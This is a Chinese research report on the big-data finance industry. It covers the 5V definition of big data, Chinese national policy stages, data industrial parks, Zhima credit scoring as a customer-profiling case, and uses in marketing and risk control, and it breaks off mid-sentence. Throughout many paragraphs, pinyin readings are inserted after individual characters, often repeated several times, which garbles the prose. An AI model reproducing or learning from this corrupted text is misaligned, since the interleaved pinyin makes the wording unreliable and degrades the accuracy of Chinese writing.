一定发平台

大数据金融产业研究报告

发布时间:2020-06-24 点击量:297 作者:战略研究部—孙坚 战略研究部—王谭熠

一、大数据定义

(一)大数据定义

大(da)数(shu)据(ju)(ju)(Big Data)是一(yi)(yi)个宽泛(fan)的(de)概念,业(ye)界(jie)尚未形(xing)成统一(yi)(yi)的(de)定义(yi),2011年,美国麦肯(ken)锡在(zai)研究报(bao)告《大(da)数(shu)据(ju)(ju)的(de)下一(yi)(yi)个前(qian)沿:创(chuang)新(xin)、竞(jing)争和(he)(he)生产力(li)》中给(ji)出了大(da)数(shu)据(ju)(ju)的(de)定义(yi):大(da)数(shu)据(ju)(ju)是指大(da)小超出典(dian)型数(shu)据(ju)(ju)库软件工具收集、存储、管理(li)(li)和(he)(he)分析能(neng)力(li)的(de)数(shu)据(ju)(ju)集。而根据(ju)(ju)Gartner的(de)定义(yi),大(da)数(shu)据(ju)(ju)是需(xu)要新(xin)处(chu)理(li)(li)模式才能(neng)具有更强的(de)决策力(li)、洞(dong)察发现力(li)和(he)(he)流程优化能(neng)力(li)的(de)海(hai)量、高增长率和(he)(he)多样化的(de)信(xin)息资产。

在互联网日益发达的时代,大数据无所不在,基于用户的每一个日常动作,都可能产生数据,将这些分散的数据汇集形成数据流,数据服务商利用特定的技术将这些数据流进行加工整理并应用于具体场景,最终形成具有使用价值的大数据。可见,大数据的概念中并非仅仅包含数据本身,也包括对数据的处理技术,此外,只有将大数据应用于合适的场景中,才能最终展示大数据的价值。

(二)大数据(ju)的5V特征

1.大体量性(Volume)

大体量性是指数据量的规模大,并且数据量呈持续增长趋势。目前大数据一般指超过10T规模的数据量,但未来随着技术的进步,符合大数据标准的数据集的大小也会变化。导致数据规模激增的主要原因在于:一是传感器等仪器获取数据的能力大幅提升,越来越多的事物特征被感知,相应的特征数据会以数据的形式被存储下来。二是互联网的普及,数据的分享和获取日益容易。三是集成电路价格和技术成熟,使得多数数据被保留下来。国际数据资讯(IDC)公司监测,全球数据量大约2年翻一番,预计2020年,全球将有35ZB的数据量。

2.时效性(Velocity)

时效性是指在数据量特别大的情况下,能够在一定时间和范围内得到及时处理,这是大数据区别于传统数据挖掘最显著的特征。只有对大数据做到实时创建、实时存储、实时处理和实时分析,才能及时有效获取高价值的信息。

3.多样性(Variety)

多样性指是大数据包括多种不同格式和不同类型的数据。数据来源的多样性导致数据类型的多样性。根据数据是否具有一定的模式、结构和关系,数据可分为三种基本类型:一是结构化数据,指遵循一个标准的模式和结构,以二维表格的形式存储在关系型数据库里的行数据,关系型数据库发展较为成熟,因此结构化数据的存储、分析方法也发展的较为全面;二是非结构化数据,是指不遵循统一的数据结构或模型的数据(如文本、图像、视频、音频等),这部分数据在企业数据中占比增长速率更快,对非结构化数据的处理分析过程也更为复杂;三是半结构化数据,是指有一定的结构性,但本质上不具有关系性,介于完全结构化数据和完全非结构化数据之间的数据,常见来源包括电子转换数据(EDI)文件、扩展表、RSS源、传感器数据。

4.真实性(Veracity)

真实性指数据的质量和保真性。结果的准确性涉及数据的可信度、偏差、噪声、异常等质量问题。保持正确的数据格式对大数据分析十分重要。

5.价值(zhi)性(Value)

价值性是指通过对大数据进行分析挖掘,产生的巨大商业价值。但值得注意的是,随着数据量的增长,隐藏在数据中有意义的信息却没有成相应比例增长,相反,价值密度的高低通常与数据总量的大小成反比,因此从数据中获取有效信息的难度在加大。

(三)大(da)数(shu)据技术的基本框架(jia)

一个典型的大数(shu)据(ju)的技术框架可以分为四(si)个层次,即(ji)数(shu)据(ju)输入层、数(shu)据(ju)存储层、数(shu)据(ju)计算(suan)层和数(shu)据(ju)分析层,此外(wai),通过资源管(guan)理保障系统整体的平稳(wen)运(yun)行。

 

1.数据输入:在数据采集的过程中,数据源会影响大数据质量的真实性、完整性、一致性、准确性和安全性。大规模的数据经过采集步骤后,才能进行后续的处理和运营。对于金融企业而言,数据来源一般分为三部分,即金融机构自身业务积累的数据,外部采集的数据和从第三方购买的数据。从数据类型上看,除传统的结构化数据外,文本、图像等非结构化或半结构化数据的应用也日益广泛。

2.数据存储:负责大规模数据的存储工作,主要利用分布式和多副本策略保证大数量级的数据安全有效的进行存储,从而为数据分析提供支持。

3.数据计算:负责大规模数据的计算工作,利用分布式和观范化的编程框架,将单机难以处理的数据分散到多台机器上进行分析处理,从而使大规模数据挖掘成为可能。

4.数据分析:将大数据与具体业务场景相结合,通过计算机深度学习等上层数据应用技术,将大数据转化为有价值的信息,实现业务增值。 数据分析是大数据处理与应用的关键环节,它决定了大数据集合的价值性和可用性,以及分析预测结果的准确性。在数据分析环节,应根据大数据应用情境与决策需求,选择合适的数据分析技术,提高大数据分析结果的可用性、价值性和准确性。

5.资源管理:负责大数据资产的管理工作,利用调度队列、实时监测等机制,随时监控物理设备的健康状况并自动调度,保证集群工作质量。


二、大数据(ju)产业(ye)发展概况

大(da)数据(ju)产业发(fa)展离不开政策支(zhi)撑。我国(guo)政府高度重视大(da)数据(ju)的(de)发(fa)展。2014年以(yi)来,国(guo)家(jia)大(da)数据(ju)战略的(de)谋(mou)篇布局经(jing)历了(le)四个不同阶段。

1.预热(re)阶段:2014年3月,“大(da)(da)(da)数据(ju)(ju)”一词首次写入政(zheng)府(fu)工(gong)作报(bao)告,为我(wo)国大(da)(da)(da)数据(ju)(ju)发展的(de)政(zheng)策环境搭建开(kai)始预热(re)。从(cong)这一年起,“大(da)(da)(da)数据(ju)(ju)”逐渐(jian)成为各级政(zheng)府(fu)和社会各界的(de)关注(zhu)热(re)点,中(zhong)央政(zheng)府(fu)开(kai)始提供积(ji)极(ji)的(de)支持(chi)政(zheng)策与适度宽(kuan)松的(de)发展环境,为大(da)(da)(da)数据(ju)(ju)发展创造机(ji)遇(yu)。

2.起步阶(jie)段(duan):2015年8月31日(ri),国(guo)务院正式印发了(le)《促(cu)进大(da)(da)数据(ju)(ju)发展行(xing)动纲要》(国(guo)发〔2015〕50号),成为我国(guo)发展大(da)(da)数据(ju)(ju)的首部战略性指导文件(jian),对包括(kuo)大(da)(da)数据(ju)(ju)产业(ye)(ye)在内的大(da)(da)数据(ju)(ju)行(xing)业(ye)(ye)整(zheng)体发展作(zuo)出部署(shu),体现出国(guo)家层面对大(da)(da)数据(ju)(ju)发展的顶层设计和统筹布(bu)局。

3.落(luo)地阶段:《十(shi)三(san)五规划(hua)纲要(yao)》的公布标志着国(guo)家大(da)数据战略的正式提出,彰显了(le)中央(yang)对于大(da)数据战略的重视(shi)。2016年(nian)12月,工信部(bu)发布《大(da)数据产业发展规划(hua)(2016-2020 年(nian))》,为大(da)数据产业发展奠定(ding)了(le)重要(yao)的基(ji)础。

4.深(shen)化阶段:国内大(da)数(shu)(shu)(shu)据(ju)(ju)(ju)行业迎来全(quan)面(mian)良好(hao)的发(fa)展态(tai)势(shi),国家(jia)大(da)数(shu)(shu)(shu)据(ju)(ju)(ju)战略也开始走向深(shen)化阶段。2017年10月,党的十九大(da)报告中提(ti)出推动大(da)数(shu)(shu)(shu)据(ju)(ju)(ju)与(yu)实体(ti)经(jing)济深(shen)度融合(he),为大(da)数(shu)(shu)(shu)据(ju)(ju)(ju)产业的未来发(fa)展指明方向。2017年12月,中央政治(zhi)局就实施国家(jia)大(da)数(shu)(shu)(shu)据(ju)(ju)(ju)战略进行了集体(ti)学习。2017年以来,每年的政府工作报告中都有(you)涉及大(da)数(shu)(shu)(shu)据(ju)(ju)(ju)的内容。

在(zai)上述大数(shu)(shu)(shu)(shu)据(ju)产(chan)(chan)(chan)业(ye)政策出台(tai)的(de)(de)同时,2016年G20杭州峰会发(fa)(fa)布(bu)了《二十国集团(tuan)数(shu)(shu)(shu)(shu)字(zi)(zi)(zi)(zi)经(jing)济(ji)(ji)发(fa)(fa)展(zhan)与(yu)合(he)作倡议》,并(bing)提出了发(fa)(fa)展(zhan)“数(shu)(shu)(shu)(shu)字(zi)(zi)(zi)(zi)经(jing)济(ji)(ji)”的(de)(de)新理念(nian)。数(shu)(shu)(shu)(shu)字(zi)(zi)(zi)(zi)经(jing)济(ji)(ji)是以(yi)(yi)信(xin)息(xi)和(he)知识的(de)(de)数(shu)(shu)(shu)(shu)字(zi)(zi)(zi)(zi)化(hua)(hua)为(wei)关键生产(chan)(chan)(chan)要(yao)素、以(yi)(yi)现(xian)代信(xin)息(xi)网(wang)络(luo)为(wei)重(zhong)要(yao)载体(ti)、以(yi)(yi)有效利(li)用(yong)信(xin)息(xi)通信(xin)技(ji)(ji)(ji)术(shu)为(wei)提升(sheng)(sheng)效率和(he)优化(hua)(hua)经(jing)济(ji)(ji)结(jie)构的(de)(de)重(zhong)要(yao)动(dong)力(li)的(de)(de)一系列经(jing)济(ji)(ji)活动(dong)。数(shu)(shu)(shu)(shu)字(zi)(zi)(zi)(zi)经(jing)济(ji)(ji)要(yao)求综合(he)推进数(shu)(shu)(shu)(shu)字(zi)(zi)(zi)(zi)产(chan)(chan)(chan)业(ye)化(hua)(hua)和(he)产(chan)(chan)(chan)业(ye)数(shu)(shu)(shu)(shu)字(zi)(zi)(zi)(zi)化(hua)(hua)两方面工(gong)(gong)作。实(shi)(shi)现(xian)数(shu)(shu)(shu)(shu)字(zi)(zi)(zi)(zi)产(chan)(chan)(chan)业(ye)化(hua)(hua), 就是不断促(cu)使信(xin)息(xi)领域的(de)(de)科(ke)研成果转(zhuan)化(hua)(hua)为(wei)数(shu)(shu)(shu)(shu)字(zi)(zi)(zi)(zi)技(ji)(ji)(ji)术(shu)、数(shu)(shu)(shu)(shu)字(zi)(zi)(zi)(zi)技(ji)(ji)(ji)术(shu)转(zhuan)化(hua)(hua)为(wei)数(shu)(shu)(shu)(shu)字(zi)(zi)(zi)(zi)产(chan)(chan)(chan)业(ye),推动(dong)包括电子信(xin)息(xi)制造业(ye)、电信(xin)业(ye)、计(ji)算(suan)机(ji)软件和(he)信(xin)息(xi)技(ji)(ji)(ji)术(shu)服务业(ye)在(zai)内的(de)(de)信(xin)息(xi)通信(xin)产(chan)(chan)(chan)业(ye)的(de)(de)持续健康发(fa)(fa)展(zhan)。实(shi)(shi)现(xian)产(chan)(chan)(chan)业(ye)数(shu)(shu)(shu)(shu)字(zi)(zi)(zi)(zi)化(hua)(hua),则是推动(dong)互联网(wang)、大数(shu)(shu)(shu)(shu)据(ju)、人工(gong)(gong)智能等新技(ji)(ji)(ji)术(shu)和(he)实(shi)(shi)体(ti)经(jing)济(ji)(ji)的(de)(de)深度(du)融合(he),充分发(fa)(fa)挥网(wang)络(luo)信(xin)息(xi)技(ji)(ji)(ji)术(shu)在(zai)产(chan)(chan)(chan)业(ye)升(sheng)(sheng)级、产(chan)(chan)(chan)品开发(fa)(fa)、服务创新等方面的(de)(de)优势,利(li)用(yong)现(xian)代信(xin)息(xi)技(ji)(ji)(ji)术(shu)对国民经(jing)济(ji)(ji)各(ge)部门进行(xing)全方位、多角度(du)、全链条的(de)(de)升(sheng)(sheng)级和(he)改造。此外,随着新型智慧城市(shi)和(he)新一代信(xin)息(xi)技(ji)(ji)(ji)术(shu)(人工(gong)(gong)智能、大数(shu)(shu)(shu)(shu)据(ju)、云计(ji)算(suan)和(he)5G等)的(de)(de)兴起,协同推进新型智慧城市(shi)、数(shu)(shu)(shu)(shu)字(zi)(zi)(zi)(zi)经(jing)济(ji)(ji)、数(shu)(shu)(shu)(shu)字(zi)(zi)(zi)(zi)政府和(he)数(shu)(shu)(shu)(shu)字(zi)(zi)(zi)(zi)社会建设,大力(li)发(fa)(fa)展(zhan)新一代信(xin)息(xi)技(ji)(ji)(ji)术(shu),成为(wei)各(ge)级政府加快推动(dong)数(shu)(shu)(shu)(shu)字(zi)(zi)(zi)(zi)化(hua)(hua)转(zhuan)型,落地数(shu)(shu)(shu)(shu)字(zi)(zi)(zi)(zi)中(zhong)国建设的(de)(de)可行(xing)举(ju)措。

2015年以(yi)来各(ge)级(ji)政府的数(shu)(shu)(shu)据意识显著提升(sheng),逐步(bu)开始(shi)重(zhong)视大(da)(da)(da)数(shu)(shu)(shu)据等数(shu)(shu)(shu)字技术对经(jing)济(ji)社会(hui)转型发(fa)展的积极作用,纷纷组建大(da)(da)(da)数(shu)(shu)(shu)据管(guan)理机(ji)构,如大(da)(da)(da)数(shu)(shu)(shu)据管(guan)理局、大(da)(da)(da)数(shu)(shu)(shu)据发(fa)展管(guan)理委员会(hui)、大(da)(da)(da)数(shu)(shu)(shu)据管(guan)理办(ban)公室等。统计显示,截至2018年底,全国共有16个省级(ji)行政区(qu)域(yu),以(yi)及(ji)79个副省级(ji)和(he)地级(ji)市先后成立(li)了大(da)(da)(da)数(shu)(shu)(shu)据管(guan)理机(ji)构,统筹推(tui)进区(qu)域(yu)大(da)(da)(da)数(shu)(shu)(shu)据产业发(fa)展。

各地的大(da)(da)数(shu)据(ju)综合试验(yan)(yan)区(qu)和大(da)(da)数(shu)据(ju)产(chan)(chan)(chan)业(ye)园(yuan)成为区(qu)域内集聚产(chan)(chan)(chan)业(ye)资(zi)源的重要载(zai)体。当前,不仅八(ba)个国(guo)家级(ji)大(da)(da)数(shu)据(ju)综合试验(yan)(yan)区(qu)(贵州(zhou)、京津冀、辽宁、内蒙古、上海、河南(nan)、重庆、珠三角)的大(da)(da)数(shu)据(ju)产(chan)(chan)(chan)业(ye)园(yuan)/基地快速发展,与这些试验(yan)(yan)区(qu)毗邻(lin)的省份,如安徽、湖北、四(si)川、陕(shan)西、浙江(jiang)、山东和江(jiang)苏,也都(dou)加快落实(shi)“大(da)(da)数(shu)据(ju)产(chan)(chan)(chan)业(ye)园(yuan)区(qu)/基地”建(jian)设(she),意(yi)图增(zeng)强(qiang)数(shu)字(zi)经济发展实(shi)力(li),助力(li)产(chan)(chan)(chan)业(ye)转型升(sheng)级(ji)。

目前,各地大数据产业园可以划分为三类:一是北京、上海、广州和深圳的大数据产业园,此类产业园多脱胎于原先的各类软件园,具有良好的发展基础和优势。二是河南、重庆、大连、沈阳、内蒙古、贵州等国家大数据综合试验区,响应国家号召,推动辖区内的产业园加速涌现并壮大。三是部分中、东部省份,如安徽、江苏和浙江等,积极顺应产业发展趋势,布局大数据产业园,加快经济社会高质量发展。


 

此外(wai),全省部分地市州均成立了(le)大数(shu)据管理局(或类似(si)职能部门)


大数据产业园通常的建设思路是:产业园的建设,重点在于强化数字基础设施建设,特别是数据中心和云计算中心的建设,同时,依托地方行政力量强化政府数据资源的汇集,逐步搭建多维度主题数据库;依托智慧城市项目招引一批大中小企业落地,其中大型企业负责平台建设,小型企业负责具体的应用开发;完善产业政策,以产业基金等形式助力大数据企业发展;鼓励企业上云用云,并结合区域特色,落地各类大数据应用解决方案。


三、大数据金融

大数据金融是指运用大数据技术和大数据平台开展金融活动和金融服务,通过收集和整合业务开展过程中积累的大数据以及外部数据中海量的(非)结构化数据,综合运用大数据、互联网、云计算等信息化手段,对客户消费数据进行实时分析,为金融企业提供客户全方位信息,通过分析和挖掘客户的交易和消费信息掌握客户的消费习惯,准确预测客户行为,提高金融服务平台效率,降低业务风险。

(一)大(da)数(shu)据金融(rong)与(yu)金融(rong)大(da)数(shu)据

金融大数据可以理解为大数据中蕴含的反映金融交易行为的基本信息,金融大数据具有大量性、多维度性和完备性等特征。彭特兰等社会物理学家认为人们面对未来决策存在“想法流”,这个想法流与人们行为之间有着可靠的数量关系,它会改变人的选择并能够推动创新。在此观点下,可以把已经发生事件的行为数据,定义为金融机构、金融业务其他相关方的“行为数据流”,把尚未发生但即将会发生事件的行为数据,定义为金融机构、金融业务其他相关方的“想法数据流”。可得到以下等式:

金融大数(shu)(shu)据(ju) = 行为数(shu)(shu)据(ju)流 + 想法(fa)数(shu)(shu)据(ju)流 = 历史(shi)数(shu)(shu)据(ju) + 现期数(shu)(shu)据(ju) + 未(wei)来数(shu)(shu)据(ju) = 数(shu)(shu)字化数(shu)(shu)据(ju) + 非数(shu)(shu)字化数(shu)(shu)据(ju)

在传统金融业务模式下,更多(duo)的利用的是历史数(shu)(shu)(shu)据(ju)和数(shu)(shu)(shu)字(zi)化(hua)数(shu)(shu)(shu)据(ju),对包含更多(duo)业务信息价(jia)值的现期数(shu)(shu)(shu)据(ju)(实时数(shu)(shu)(shu)据(ju))、未来数(shu)(shu)(shu)据(ju)和非数(shu)(shu)(shu)字(zi)化(hua)数(shu)(shu)(shu)据(ju)的使用较(jiao)少(shao)。

大数据金融是指运用大数据分析方法从事金融活动的方法和过程,即金融业务参与方依靠云计算、机器学习、物联网、区块链等人工智能技术来匹配金融大数据的方法和过程。较之于金融大数据,大数据金融关注大数据工具的选择和运用,注重在金融活动具体场景中追求效用的最大化,在现已运用的科技中,云平台是搜集、分类大数据的基础,集约化云计算是加工和处理大数据的主要技术手段,机器学习、物联网、区块链等其他人工智能技术则是对多维度大数据进行甄别、判断和预测的主要分析工具。要正确把握金融大数据内涵从而消除金融活动不确定性,关键在于不仅要能加工和处理历史数据,而且要能加工和处理现期数据和未来数据,并且能够从历史数据、现期数据和未来数据中获得准确信息。

在金(jin)融行(xing)业(ye)不同(tong)的(de)细分(fen)(fen)行(xing)业(ye)中,大(da)数据的(de)使用场景有所不同(tong),银行(xing)业(ye)更多地(di)将大(da)数据金(jin)融技术应(ying)用于精(jing)准营销、风险管控和(he)运(yun)营优化等方(fang)面(mian);保险行(xing)业(ye)依托大(da)数据开展客户细分(fen)(fen)和(he)精(jing)细化营销,开展欺(qi)诈行(xing)为分(fen)(fen)析,精(jing)细化运(yun)营;证券行(xing)业(ye)主要用于股价预(yu)测、客户关系管理等方(fang)面(mian)。

在大(da)数据技术日益成熟的背景(jing)下,大(da)数据征信(xin)行(xing)(xing)业发展也(ye)(ye)进入快车(che)道,2015年6月,芝麻(ma)信(xin)用签约(yue)北京银行(xing)(xing),也(ye)(ye)开启(qi)商业银行(xing)(xing)应用互联网征信(xin)的先河,大(da)数据征信(xin)逐渐成为金融行(xing)(xing)业重要(yao)的应用领(ling)域。

(二)依托大数据实现对客户动态画像

大数据客户画像是对现实世界中客户的数字建模,其本质是将金融大数据通过算法标签化客户的信息与行为特征,完美地抽象出一个用户的信息全貌,为进一步精准、快速分析用户行为习惯、消费习惯等重要信息,提供了基础。

1.客户画(hua)像流程(cheng)

大数据(ju)技术下(xia)的(de)客户画像(xiang)的(de)基(ji)本流程主(zhu)要包括(kuo)以(yi)下(xia)几(ji)个(ge)步(bu)骤:

(1)多渠道数据整合,收集客户多维数据

传统的(de)客户(hu)画像,大(da)多(duo)凭借个人(ren)经(jing)验对少量数(shu)(shu)据(ju)进行人(ren)工分(fen)(fen)析,而大(da)数(shu)(shu)据(ju)客户(hu)画像,依托“大(da)数(shu)(shu)据(ju)”技术搜集(ji)客户(hu)的(de)海量数(shu)(shu)据(ju)并进行智能化(hua)的(de)分(fen)(fen)析计算。这就(jiu)要求数(shu)(shu)据(ju)来源广(guang)泛、数(shu)(shu)据(ju)类(lei)型多(duo)样、数(shu)(shu)据(ju)内(nei)容(rong)丰富。

(2)多种算法提取特征,进行行为建模

获得数据(ju)后,需要(yao)经过(guo)清洗、去(qu)重(zhong)、去(qu)无(wu)效、去(qu)异常(chang)等处理,通过(guo)对数据(ju)进行(xing)加工,从而完成特征提(ti)取(qu),进行(xing)行(xing)为建(jian)(jian)模,以抽象出用户的标(biao)签。这一(yi)阶段,就(jiu)要(yao)运用到各(ge)种算(suan)法与机(ji)器学习方法,建(jian)(jian)立多种智能模型(xing),根(gen)据(ju)客(ke)户的已知信息,对客(ke)户的行(xing)为、偏好进行(xing)分析、猜测。

(3)标签化管理,构建全貌型客户画像

客户画像最终要(yao)用标(biao)签集合来表示。从数据(ju)提取维(wei)度来看,标(biao)签可分(fen)为事实标(biao)签、模型标(biao)签和预测(ce)标(biao)签。

事实标(biao)签(qian)是定量或定性(xing)(xing)描述客(ke)户(hu)(hu)的(de)基本属性(xing)(xing)、消费(fei)属性(xing)(xing)、资源属性(xing)(xing)等;模(mo)型标(biao)签(qian)是通过分析客(ke)户(hu)(hu)的(de)基础数据对客(ke)户(hu)(hu)属性(xing)(xing)及行(xing)为等进行(xing)抽象和聚类,从而为客(ke)户(hu)(hu)贴上相应的(de)总(zong)结(jie)概括性(xing)(xing)标(biao)签(qian)及指数,标(biao)签(qian)代表客(ke)户(hu)(hu)的(de)兴趣、偏好、需(xu)求等,指数代表客(ke)户(hu)(hu)的(de)兴趣程度、需(xu)求程度、购买概率等;预测标(biao)签(qian)是基于(yu)客(ke)户(hu)(hu)的(de)属性(xing)(xing)、行(xing)为、位置(zhi)和特征,挖掘潜在(zai)(zai)的(de)客(ke)户(hu)(hu)与客(ke)户(hu)(hu)潜在(zai)(zai)需(xu)求,以(yi)便(bian)针对性(xing)(xing)地配合(he)营(ying)销策略与规则,实现适(shi)时、适(shi)机、适(shi)景的(de)营(ying)销。

2.客户画像案例

在金融领域,大数据(ju)客户画像(xiang)最为(wei)成功的(de)应(ying)用(yong)是(shi)芝(zhi)麻评(ping)(ping)分(fen)(fen)模型,芝(zhi)麻分(fen)(fen)主要包括五个维度,即信用(yong)历(li)史、行(xing)为(wei)偏好、履约能(neng)力、身份特(te)质和(he)人脉关(guan)系。芝(zhi)麻评(ping)(ping)分(fen)(fen)已经在多个生活场(chang)景得(de)到运(yun)用(yong),2016年与北(bei)京银(yin)行(xing)开展业务合(he)作以来,芝(zhi)麻评(ping)(ping)分(fen)(fen)逐渐在银(yin)行(xing)企业全(quan)流程的(de)信用(yong)风险管理中得(de)到应(ying)用(yong)。

(1) 数据来源

阿里巴巴和蚂蚁金服本身积累的数据,是芝麻分的一大优势。这些数据包括淘宝、天猫等电商平台网络购物的相关行为数据,支付宝平台水电煤电信缴费数据、各种生活服务场景相关数据,还有千万级以上的贷款数据。其中,贷款数据包括阿里巴巴平台上接近两百多万的小企业贷款数据,千万级的天猫分期购的数据,以及消费者无忧支付产品蚂蚁花呗的数据。

但芝麻信用的数(shu)(shu)据(ju)(ju)来源中除内部(bu)数(shu)(shu)据(ju)(ju)外,更(geng)多地来源于外部(bu)数(shu)(shu)据(ju)(ju),外部(bu)数(shu)(shu)据(ju)(ju)大致可以(yi)分(fen)为(wei)公共部(bu)门(men)数(shu)(shu)据(ju)(ju)、合作(zuo)企业的数(shu)(shu)据(ju)(ju)、金融机构(gou)的数(shu)(shu)据(ju)(ju)、用户自主上传的数(shu)(shu)据(ju)(ju)等几个(ge)方面。

(2)评分维度

a.身份特质:是(shi)指在使用(yong)相关服务过程中留下的个(ge)人(ren)基(ji)本信息,包括从公安、学历学籍、工(gong)商、法院(yuan)等公共部门获得的个(ge)人(ren)资料,未来还可能(neng)包括网络(luo)使用(yong)习惯等可以(yi)用(yong)于推测(ce)个(ge)人(ren)性格的数(shu)据。

b.履(lv)(lv)约(yue)能(neng)力:包括享(xiang)用(yong)各类信用(yong)服务并确保及时(shi)履(lv)(lv)约(yue),例(li)如租车是否(fou)按时(shi)归还(hai),水电煤(mei)气是否(fou)按时(shi)交(jiao)费(fei)等,还(hai)包括通(tong)过消(xiao)费(fei)情况、消(xiao)费(fei)稳定性、消(xiao)费(fei)层次(ci)等等来(lai)判断用(yong)户未来(lai)履(lv)(lv)约(yue)有(you)什么样的能(neng)力。

c.信用(yong)(yong)(yong)历(li)史(shi):是指过往(wang)信用(yong)(yong)(yong)账户(hu)(hu)(hu)还款(kuan)记录及信用(yong)(yong)(yong)账户(hu)(hu)(hu)历(li)史(shi)。这(zhei)些历(li)史(shi)包括用(yong)(yong)(yong)户(hu)(hu)(hu)在蚂(ma)蚁(yi)(yi)微贷、蚂(ma)蚁(yi)(yi)花呗等蚂(ma)蚁(yi)(yi)金服旗下(xia)服务的(de)信用(yong)(yong)(yong)历(li)史(shi)、用(yong)(yong)(yong)支付(fu)宝还款(kuan)的(de)历(li)史(shi),还包括用(yong)(yong)(yong)户(hu)(hu)(hu)在合作伙伴处产生的(de)信用(yong)(yong)(yong)历(li)史(shi)。

d.人(ren)脉关(guan)(guan)系:是(shi)指好(hao)友(you)(you)的身份特征以及跟好(hao)友(you)(you)互动的程度。根据“物以类聚人(ren)以群(qun)分”的理论,通过(guo)转账关(guan)(guan)系、校友(you)(you)关(guan)(guan)系等作为评判个(ge)人(ren)信用的依据之一。

e.行(xing)为偏好(hao):是(shi)指在购物、缴费、转账、理财等(deng)活动中的偏好(hao)及稳定性。

2016年7月(yue)19日(ri),芝麻信(xin)用宣(xuan)布(bu)研发了小(xiao)(xiao)微企(qi)(qi)(qi)业(ye)(ye)(ye)(ye)(ye)信(xin)用洞(dong)察“灵芝”系统,接入了司(si)法、纳(na)税、工商、海关(guan)、企(qi)(qi)(qi)业(ye)(ye)(ye)(ye)(ye)经(jing)(jing)营(ying)、运营(ying)商等(deng)丰(feng)富的(de)(de)数(shu)(shu)据源,推出(chu)了风险云图(tu)、关(guan)注名单、信(xin)用评分(fen)和指数(shu)(shu)、风险监(jian)控预警、企(qi)(qi)(qi)业(ye)(ye)(ye)(ye)(ye)信(xin)用报告五(wu)大产品(pin),为(wei)中小(xiao)(xiao)企(qi)(qi)(qi)业(ye)(ye)(ye)(ye)(ye)提供(gong)企(qi)(qi)(qi)业(ye)(ye)(ye)(ye)(ye)信(xin)用分(fen)服务。企(qi)(qi)(qi)业(ye)(ye)(ye)(ye)(ye)信(xin)用分(fen)主(zhu)要(yao)从以下五(wu)个维度进行(xing)评估:一是基本信(xin)息,主(zhu)要(yao)包括(kuo)(kuo)公司(si)历史(shi)和规模;二是履(lv)约历史(shi),主(zhu)要(yao)包括(kuo)(kuo)企(qi)(qi)(qi)业(ye)(ye)(ye)(ye)(ye)是否涉及金融纠(jiu)纷、是否有(you)逾期等(deng)信(xin)息;三是经(jing)(jing)营(ying)行(xing)为(wei),主(zhu)要(yao)关(guan)注企(qi)(qi)(qi)业(ye)(ye)(ye)(ye)(ye)有(you)无造(zao)假、企(qi)(qi)(qi)业(ye)(ye)(ye)(ye)(ye)运营(ying)是否健康;四是企(qi)(qi)(qi)业(ye)(ye)(ye)(ye)(ye)法定代表人的(de)(de)信(xin)用状况(kuang);五(wu)是企(qi)(qi)(qi)业(ye)(ye)(ye)(ye)(ye)的(de)(de)关(guan)联(lian)关(guan)系,主(zhu)要(yao)包含(han)关(guan)联(lian)公司(si)以及合作伙伴的(de)(de)情况(kuang)。

可见,依托大(da)数据技(ji)术(shu)的客(ke)户(hu)画像(xiang)是大(da)数据在金融行(xing)业5V特(te)征的具体体现(xian)过程,通过客(ke)户(hu)画像(xiang),实现(xian)对客(ke)户(hu)全方位的了(le)解,能有效(xiao)缓(huan)解普惠(hui)金融业务开展中信息不对称(cheng)问题。

(三)推动(dong)业务场景化(hua)、精准化(hua)

在实现对客户画像后(hou),根据业务(wu)驱动的应用(yong)场(chang)景的不同,大数(shu)据金融主要(yao)应用(yong)于精准营销、风险控制、改善经营、服(fu)务(wu)创新和产品创新等(deng)五个(ge)方(fang)面。

1.精准营销(xiao)

精准营销是在对客户实现画像,精准定位客户需求的基础上,建立个性化的顾客沟通服务体系,实现企业可度量的低成本扩张之路。精准营销是相对大众营销而言的,是利用技术手段寻找精确的目标客户的营销过程。精准营销的优势在于:一是低成本,相比以往的营销体系来说,精准营销将受众面进一步缩小,在人力资源成本日益高涨的大环境下,可以节约大量的人力成本,节省推广成本。二是高效率,“精准”是精准营销体系中的一大特征,通过现代化信息技术手段对客户进行画像,对客户市场进行细分,“精准”匹配,准确接触,可以大幅提高营销的成功率。三是个性化,通过对市场的细分,直接服务目标受众,并按照客户的特殊要求进行个性化产品开发。

在大数据金融应用于精准营销方向上有一个经典的案例:某位信用卡客户月均刷卡8次,平均每次刷卡金额800元,平均每年打4次客服电话,从未有过投诉,按照传统的数据分析,该客户是位满意度较高、流失风险较低的客户。但如果看到该客户的微博,得到的真实情况是:工资卡和信用卡不在同家银行,还款不方便,好几次打客服电话没接通,客户多次在微博上抱怨,该客户流失风险较高。

2.动态风控

应用大(da)数(shu)(shu)据(ju)技(ji)术,可(ke)以统一管理(li)金融企业(ye)内部(bu)多源(yuan)异构数(shu)(shu)据(ju)与外(wai)部(bu)征信(xin)数(shu)(shu)据(ju),可(ke)以更好地(di)完善风控(kong)体系。内部(bu)可(ke)保(bao)障数(shu)(shu)据(ju)的(de)完整性(xing)与安全性(xing),外(wai)部(bu)可(ke)控(kong)制用户风险。

大数据风控并不是完全改变传统风控,而是丰富传统风控的数据纬度,依然利用信用属性强的金融数据,判断借款人的还款能力和还款意愿,并利用信用属性较弱的行为数据进行补充,一般是利用数据的关联分析来判断融资人的信用情况,借助数据模型来揭示某些行为特征和信用风险之间的关系。

金融行业在之前主要依靠经验和宏观经济形势来实施风险控制,以定性为主,更多依赖风险管理精英的个人能力,特别在经济发展很好的时期,风险管理偏好不太科学,不能够反应出真正的风险水平。定性的风险管理占主体,定量的风险管理起到很小的作用。随着巴塞尔III 协议的推行,越来越多的银行正在重视定量风险管理,积极利用风控模型来实施风险评估,但大多数国内银行的风控模型大多从国外引入,而信用风险和操作风险比较复杂,很多国外的信用风险模型效果不太明显。

较之传统量化风控(kong)模型,大数据风控(kong)使用的数据范(fan)围更为(wei)广(guang)泛,大数据风控(kong)优势在于:

